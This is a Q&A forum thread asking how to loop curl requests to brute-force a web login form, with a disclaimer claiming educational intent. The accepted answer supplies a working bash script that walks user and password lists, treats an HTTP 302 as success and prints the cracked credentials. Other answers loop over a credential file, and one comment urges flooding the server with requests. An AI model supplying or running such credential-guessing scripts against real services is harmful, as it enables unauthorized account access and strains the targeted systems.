# How do I curl a request to bruteforce an unsecure login

Tags: bash, curl

### Disclaimer:

This is for educational purposes only, and obviously the `login` module is designed to be bruteforced.

### Question:

I have login with a `user` similar to the `pass`. The `user` is a number like so:

```
1234001
```

I can login using a single request like so:

```
curl -iL --data-urlencode  user="1234001" --data-urlencode password="1234001" http://foo.dev/login
```

Now the question is that how do, I loop with it, assuming that I received a 302 code if success

```
url="http://foo.dev/login"
for i in 300; do
    curl -iL --data-urlencode  user="1234001" --data-urlencode password="1234001" http://foo.dev/login
 // if????
done
```

Comment: write a script in a language that has a curl module. abuse the hell out of calling it a million times per second.

Comment: @Joey Salac Hipolito I UPDATED my answer and worked correctly

Answer (score 1, accepted):

I would suggest changing the `curl` invocation a bit:

```
url="http://foo.dev/login"
for user in $(userlist_gen); do
  for pass in $(passlist_gen); do
    http_code=$(curl -L --data-urlencode  user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s)
    if [[ $http_code -eq 302 ]]; then
      echo "Success: User: '$user' Pass: '$pass'"
      break 2
    fi
  done
done
```

- `-o /dev/null` prints the returned website into `/dev/null`, essentially discarding it
- `-i` is not needed with the output going to `/dev/null`
- `-s` suppresses any error messages (optional, but disables progress output)
- `-w '%{http_code}'` prints the HTTP response code to stdout after completed operation.

This code will loop over all user IDs generated by `userlist_gen` (maybe use `seq 1234001 1234999` for that) and then loop for each user over the passwords generated by `passlist_gen`. `-o /dev/null` and `-w '%{http_code}'` leave only the HTTP response code as output on stdout, which is stored in `$http_code`. This is then compared for equality with `302` and exits both loops on success. (If you want to try all users use just `break` instead of `break 2`.

Answer (score 2):

firstly:

```
cat input.txt
user1 pass1
user2 pass2
 .      .
 .      .
 .      .
```

Then try:

```
#!/bin/bash
if [ $# -ne 1 ];then
   echo "Usage: ./script <input-file>"
   exit 1
fi

while read user pass; do
curl -iL --fail --data-urlencode  user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
   if [ $? -eq 0 ];then
      echo "ok"
   elif [ $? -ne 0 ]; then
      echo "failed"
   fi
done < $1
```

Also `HEREDOC` solution:

```
#!/bin/bash  
    while read user pass; do
    curl -iL --fail --data-urlencode  user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
       if [ $? -eq 0 ];then
          echo "ok"
       elif [ $? -ne 0 ]; then
          echo "failed"
       fi
    done <<__HERE
    user1 pass1
    user2 pass2
     .      .
     .      .
     .      .
    __HERE
```

Answer (score 0):

You can check the return value in following way:

```
curl -iL --data-urlencode  user="1234001" --data-urlencode password="1234001" http://foo.dev/login; ret=$?

echo "return value is $ret"
if [ $ret != 0 ];then
   echo "call failed"
fi
```

You need to put above code in a while loop. $? stores the exit status of the last command.